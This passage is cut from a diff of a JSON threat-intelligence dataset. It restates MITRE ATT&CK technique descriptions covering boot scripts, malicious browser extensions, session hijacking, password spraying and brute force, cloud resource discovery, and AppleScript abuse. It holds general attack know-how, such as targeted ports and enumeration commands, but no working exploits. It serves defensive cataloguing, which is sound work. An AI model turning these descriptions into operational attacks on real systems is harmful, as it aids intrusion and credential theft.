Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)] To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.[[Ubuntu Manpage systemd rc](https://app.tidalcyber.com/references/6be16aba-a37f-49c4-9a36-51d2676f64e6)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1037.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "46ef0f74-b028-4b35-8980-bed066feb60c", + "value": "RC Scripts" + }, + { + "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.[[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)]\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)] Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1037.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "3d52cd7c-d81b-4762-9749-612bbbccb415", + "value": "Startup Items" + }, + { + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "fdf95fac-f7f2-4901-b5fe-b2bafa443939", + "type": "similar" + }, + { + "dest-uuid": "b34ba0fd-493c-4e68-91c4-918f495ad07c", + "type": "similar" + }, + { + "dest-uuid": "3701f955-596b-422e-9fce-09c4f49cf080", + "type": "similar" + }, + { + "dest-uuid": "46ef0f74-b028-4b35-8980-bed066feb60c", + "type": "similar" + }, + { + "dest-uuid": "3d52cd7c-d81b-4762-9749-612bbbccb415", + "type": "similar" + } + ], + "uuid": "c51f799b-7305-43db-8d3b-657965cad68a", + "value": "Boot or Logon Initialization Scripts" + }, + { + "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.[[Wikipedia Browser Extension](https://app.tidalcyber.com/references/52aef082-3f8e-41b4-af95-6631ce4c9e91)][[Chrome Extensions Definition](https://app.tidalcyber.com/references/fe00cee9-54d9-4775-86da-b7db73295bf7)]\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.[[Malicious Chrome Extension Numbers](https://app.tidalcyber.com/references/f34fcf1f-370e-4b6e-9cc4-7ee4075faf6e)] Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.[[xorrior chrome extensions macOS](https://app.tidalcyber.com/references/84bfd3a1-bda2-4821-ac52-6af8515e5879)]\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.[[Chrome Extension Crypto Miner](https://app.tidalcyber.com/references/ae28f530-40da-451e-89b8-b472340c3e0a)][[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)][[Banker Google Chrome Extension Steals Creds](https://app.tidalcyber.com/references/93f37adc-d060-4b35-9a4d-62d2ad61cdf3)][[Catch All Chrome Extension](https://app.tidalcyber.com/references/eddd2ea8-89c1-40f9-b6e3-37cbdebd210e)]\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.[[Stantinko Botnet](https://app.tidalcyber.com/references/d81e0274-76f4-43ce-b829-69f761e280dc)] There have also been similar examples of extensions being used for command & control.[[Chrome Extension C2 Malware](https://app.tidalcyber.com/references/b0fdf9c7-614b-4269-ba3e-7d8b02aa8502)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "040804f6-6a87-4011-8716-66682bc16ed4", + "value": "Browser Extensions" + }, + { + "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.[[Kaspersky Autofill](https://app.tidalcyber.com/references/561ff84d-17ce-511c-af0c-059310f3c129)]\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).[[Chrome Roaming Profiles](https://app.tidalcyber.com/references/cf0bb77d-c7f7-515b-9217-ba9120cdddec)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "f1af5c8b-3210-4788-a873-97b1518bb43a", + "value": "Browser Information Discovery" + }, + { + "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.[[Wikipedia Man in the Browser](https://app.tidalcyber.com/references/f8975da7-4c50-4b3b-8ecb-c99c9b3bc20c)]\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.[[Cobalt Strike Browser Pivot](https://app.tidalcyber.com/references/0c1dd453-7281-4ee4-9c8f-bdc401cf48d7)][[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)] Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "b57c5554-5a46-42cd-be7e-4206f79ef424", + "value": "Browser Session Hijacking" + }, + { + "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1110.004" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "6d300882-d404-4f77-a19d-4a2f2b786702", + "value": "Credential Stuffing" + }, + { + "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://app.tidalcyber.com/technique/97ef6135-47d4-4b91-8783-c0b5f331340e) in order to obtain hashed credentials for network devices.[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)] \n\nTechniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.[[Wikipedia Password cracking](https://app.tidalcyber.com/references/d5ebb79f-b39a-46cb-b546-2db383783a58)] The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1110.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "7e8c3c70-2e9f-4fa0-b083-ff5610447dc1", + "value": "Password Cracking" + }, + { + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. [[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n* SNMP (161/UDP and 162/TCP/UDP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]. Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.[[Trend Micro Emotet 2020](https://app.tidalcyber.com/references/150327e6-db4b-4588-8cf2-ee131569150b)]\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1110.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "e849ebcc-e0af-45a5-aefa-c394bb759b4e", + "value": "Password Guessing" + }, + { + "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. [[BlackHillsInfosec Password Spraying](https://app.tidalcyber.com/references/f45c7a4b-dafc-4e5c-ad3f-db4b0388a1d7)]\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1110.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a", + "value": "Password Spraying" + }, + { + "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), or [Password Policy Discovery](https://app.tidalcyber.com/technique/2bf2e498-99c8-4e36-ad4b-e675d95ac925). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) as part of Initial Access.", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "6d300882-d404-4f77-a19d-4a2f2b786702", + "type": "similar" + }, + { + "dest-uuid": "7e8c3c70-2e9f-4fa0-b083-ff5610447dc1", + "type": "similar" + }, + { + "dest-uuid": "e849ebcc-e0af-45a5-aefa-c394bb759b4e", + "type": "similar" + }, + { + "dest-uuid": "e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a", + "type": "similar" + } + ], + "uuid": "c16eef78-232e-47a2-98e9-046ec075b13c", + "value": "Brute Force" + }, + { + "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.[[Docker Build Image](https://app.tidalcyber.com/references/ee708b64-57f3-4b47-af05-1e26b698c21f)]\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://app.tidalcyber.com/technique/2618638c-f6bd-4840-a297-c45076e094a9) using that custom image.[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)][[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)] If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ", + "meta": { + "platforms": [ + "Containers" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "49749e13-48ed-49fc-82d1-13ae13b457c1", + "value": "Build Image on Host" + }, + { + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.[[MSDN Clipboard](https://app.tidalcyber.com/references/2c1b2d58-a5dc-4aee-8bdb-129a81c10408)][[clip_win_server](https://app.tidalcyber.com/references/8a961fa1-def0-5efe-8599-62e884d4ea22)][[CISA_AA21_200B](https://app.tidalcyber.com/references/633c6045-8990-58ae-85f0-00139aa9a091)] Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243)).[[mining_ruby_reversinglabs](https://app.tidalcyber.com/references/ca2074d8-330b-544e-806f-ddee7b702631)]\n\nmacOS and Linux also have commands, such as pbpaste, to grab clipboard contents.[[Operating with EmPyre](https://app.tidalcyber.com/references/459a4ad5-0e28-4bfc-a73e-b9dd516d516f)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "e8f90b73-2e59-4643-a274-78b85b8d9f88", + "value": "Clipboard Data" + }, + { + "description": "Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.[[AWS Systems Manager Run Command](https://app.tidalcyber.com/references/ef66f17b-6a5b-5eb8-83de-943e2bddd114)][[Microsoft Run Command](https://app.tidalcyber.com/references/4f2e6adb-6e3d-5f1f-b873-4b99797f2bfa)][[SpecterOps Lateral Movement from Azure to On-Prem AD 2020](https://app.tidalcyber.com/references/eb97d3d6-21cb-5f27-9a78-1e8576acecdc)]\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) to execute commands in connected virtual machines.[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]", + "meta": { + "platforms": [ + "Azure AD", + "IaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "944a7b91-c58e-567d-9e2c-515b93713c50", + "value": "Cloud Administration Command" + }, + { + "description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)][[Amazon Describe Instances API](https://app.tidalcyber.com/references/95629746-43d2-4f41-87da-4bd44a43ef4a)][[AWS Get Public Access Block](https://app.tidalcyber.com/references/f2887980-569a-4bc2-949e-bd8ff266c43c)][[AWS Head Bucket](https://app.tidalcyber.com/references/1388a78e-9f86-4927-a619-e0fcbac5b7a1)] Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project [[Google Compute Instances](https://app.tidalcyber.com/references/ae09e791-a00c-487b-b0e5-7768df0679a3)], and Azure's CLI command az vm list lists details of virtual machines.[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)] In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://app.tidalcyber.com/technique/a0e40412-cbfb-477b-87fc-40f2c84d26be).[[Malwarebytes OSINT Leaky Buckets - Hioureas](https://app.tidalcyber.com/references/67ebcf71-828e-4202-b842-f071140883f8)]\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)] The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. [[AWS Describe DB Instances](https://app.tidalcyber.com/references/85bda17d-7b7c-4d0e-a0d2-2adb5f0a6b82)] Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://app.tidalcyber.com/technique/5d0a3722-52b6-4968-a367-7ca6bc9a33fc), this technique focuses on the discovery of components of the provided services rather than the services themselves.", + "meta": { + "platforms": [ + "IaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "fd346e4e-b22f-4cae-bc24-946d7b14b5e1", + "value": "Cloud Infrastructure Discovery" + }, + { + "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.[[Google Command Center Dashboard](https://app.tidalcyber.com/references/a470fe2a-40ce-4060-8dfc-2cdb56bbc18b)]\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "315ce434-ad6d-4dae-a1dd-6db944a44422", + "value": "Cloud Service Dashboard" + }, + { + "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[[Azure - Resource Manager API](https://app.tidalcyber.com/references/223cc020-e88a-4236-9c34-64fe606a1729)][[Azure AD Graph API](https://app.tidalcyber.com/references/fed0fef5-e366-4e24-9554-0599744cd1c6)]\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[[Azure - Stormspotter](https://app.tidalcyber.com/references/42383ed1-9705-4313-8068-28a22a23f50e)][[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6) or [Disable or Modify Cloud Logs](https://app.tidalcyber.com/technique/6824cdb3-a4c5-45a8-a3d5-5a5afd347214).", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "5d0a3722-52b6-4968-a367-7ca6bc9a33fc", + "value": "Cloud Service Discovery" + }, + { + "description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://app.tidalcyber.com/technique/fd346e4e-b22f-4cae-bc24-946d7b14b5e1)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS [[ListObjectsV2](https://app.tidalcyber.com/references/727c2077-f922-4314-908a-356c42564181)] and List Blobs in Azure[[List Blobs](https://app.tidalcyber.com/references/f9aa697a-83dd-4bae-bc11-006be51ce477)] .", + "meta": { + "platforms": [ + "IaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "92761d92-a288-4407-a112-bb2720f07d07", + "value": "Cloud Storage Object Discovery" + }, + { + "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.[[Apple AppleScript](https://app.tidalcyber.com/references/b23abcb8-3004-4a42-8ada-58cdbd65e171)] These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.[[SentinelOne AppleScript](https://app.tidalcyber.com/references/bb6aafcb-ed30-404a-a9d9-b90503a0ec7c)]\n\nAppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s, which otherwise would require compilation and execution in a mach-O binary file format.[[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)] Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65).[[Macro Malware Targets Macs](https://app.tidalcyber.com/references/d63f3f6a-4486-48a4-b2f8-c2a8d571731a)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1059.002" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "9f06ef9b-d587-41d3-8fc8-7d539dac5701", + "value": "AppleScript" + }, + { + "description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud 